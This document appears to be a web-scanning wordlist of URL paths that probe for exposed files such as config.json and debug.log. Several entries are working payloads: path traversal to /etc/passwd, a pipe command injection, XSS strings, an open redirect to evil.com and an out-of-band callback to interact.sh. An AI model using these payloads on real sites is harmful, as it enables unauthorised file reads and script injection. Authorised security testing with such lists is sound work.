_wpeprivate/config.json
logs
logs/user.txt
api/metadata
api/resource
api/v1/0.0.1/users/***
api/v1/0.0.2/0.1/users/***
apis/users/0-0-0/0.0.1
apis/users/0.0.1/1.0.0
+CSCOE+/saml/sp/acs?tgname=a
clkn/http/evil.com?.redacted.com
web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
php/ping.php?hostname=|dir
lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E
gsearch.php.en?prod=';prompt`document.domain`;//
apply_sec.cgi
wp-admin/admin-ajax.php?action=directorist_author_pagination
wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
uir//etc/passwd
cgi-bin/status/status.cgi
wnm/login/login.json
wp-content/debug.log
